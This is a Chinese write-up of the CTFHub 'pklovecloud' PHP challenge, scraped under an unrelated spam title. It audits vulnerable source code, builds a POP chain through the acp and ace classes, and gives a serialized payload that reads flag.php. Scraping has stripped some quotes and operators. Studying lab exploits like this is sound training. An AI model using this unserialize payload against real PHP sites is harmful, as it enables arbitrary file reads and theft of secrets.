当前位置：首页 > news >正文

山东阳信建设局网站七牛云wordpress加速

news 2026/4/29 13:43:53

山东阳信建设局网站,七牛云wordpress加速,昆山网站网站建设,wap网站趋势分析1.靶场环境 ctfhub-技能树-pklovecloud 引用题目#xff1a; 2021-第五空间智能安全大赛-Web-pklovecloud 2.过程 2.1源代码启动靶场环境#xff0c;访问靶场环境#xff0c;显示源码#xff1a;直接贴在下面#xff1a; ?php include flag.php; class pks…1.靶场环境 ctfhub-技能树-pklovecloud 引用题目 2021-第五空间智能安全大赛-Web-pklovecloud 2.过程 2.1源代码启动靶场环境访问靶场环境显示源码直接贴在下面 ?php include flag.php; class pkshow { function echo_name() { return Pk very safe^.^; } } class acp { protected $cinder; public $neutron;public $nova;function __construct() { $this-cinder new pkshow;} function __toString() { if (isset($this-cinder)) return $this-cinder-echo_name(); } } class ace { public $filename; public $openstack;public $docker; function echo_name() { $this-openstack unserialize($this-docker);$this-openstack-neutron $heat;if($this-openstack-neutron $this-openstack-nova){$file ./{$this-filename};if (file_get_contents($file)) { return file_get_contents($file); } else { return keystone lost~; } }} } if (isset($_GET[pks])) {$logData unserialize($_GET[pks]);echo $logData; } else { highlight_file(__file__); } ? 2.2代码审计思路进行一下代码审计记录一下思路 1.直接看主函数 if (isset($_GET[pks])) {$logData unserialize($_GET[pks]);echo $logData; } else { highlight_file(__file__); } 要进入if语句中就必须传入一个get参数pks然后对pks参数进行反序列化获得logData对象并且输出这个logData对象。 2.echo在输出一个对象时是去调用这个对象的__toString()方法因此我们跟踪到logData的__toString()方法我们发现声明的acp对象有__toString()方法 class acp { protected $cinder; public $neutron;public $nova;function __construct() { $this-cinder new pkshow;} function __toString() { if (isset($this-cinder)) return $this-cinder-echo_name(); } } 3.这就说明在主函数中要echo一个logData对象我们只需要让这个logData对象是acp类即可因此我们构造pop链时首先创建一个acp对象。 4.我们观察到acp对象的__toString()方法中的if语句要进入到这个if语句就需要acp对象的cinder参数不为空并且最终会return这个acp对象的cinder属性的echo_name()方法。 5.通过上面我们构造一个pop链 acp-cinder-echo_name() 6.我们发现声明的pkshow和ace对象都有echo_name()方法而很明显pkshow的echo_name()方法是写死的没有参数传入的因此我们需要使用ace对象。所以根据上面的调用链我们需要让acp对象的cinder参数为ace对象。综合以上几点我们需要构造pop链 $acpnew acp(); $acenew $ace(); $acp-cinder$ace; 7.通过以上pop链已经可以调用到ace对象的echo_name()方法了我们去看这个方法的执行逻辑 class ace { public $filename; public $openstack;public $docker; function echo_name() { $this-openstack unserialize($this-docker);$this-openstack-neutron $heat;if($this-openstack-neutron $this-openstack-nova){$file ./{$this-filename};if (file_get_contents($file)) { return file_get_contents($file); } else { return keystone lost~; } }} } 发现最终的结果是返回$file指向文件的内容因此我们设置$fileflag.php而我们要进入if循环就需要满足$this-openstack-neutron $this-openstack-nova也就是ace对象的openstack参数的neutron属性和nova属性相等我们发现acp对象有这两个属性因此我们要让ace对象的openstack属性为acp对象需要新建一个acp对象。 $this-openstack unserialize($this-docker); 根据这行代码我们判断openstack参数是由docker参数反序列化得到的因此ace对象的docker参数就是acp对象。下一行代码 $this-openstack-neutron $heat; 这行代码中heat参数并不存在因此neutron的值为null我们需要让nova参数的值也为null因此我们在声明acp对象的时候不需要给nova赋值结合上述构造pop链 class acp { public $cinder; public $neutron;public $nova; } class ace { public $filename; public $openstack;public $docker; } $acpnew acp();$acp2new acp();$acenew $ace(); $ace-filenameflag.php; $ace-dockerserialize($acp2);$acp-cinder$ace; echo serialize($acp); 这样最后输出的值就是我们构造的恶意参数得到pop链 O:3:acp:3:{s:6:cinder;O:3:ace:3:{s:8:filename;s:8:flag.php;s:9:openstack;N;s:6:docker;s:58:O:3:acp:3:{s:6:cinder;N;s:7:neutron;N;s:4:nova;N;};}s:7:neutron;N;s:4:nova;N;} 访问index.php构造恶意参数pksF12查看源码获得flag

查看全文

http://www.hkea.cn/news/14462295/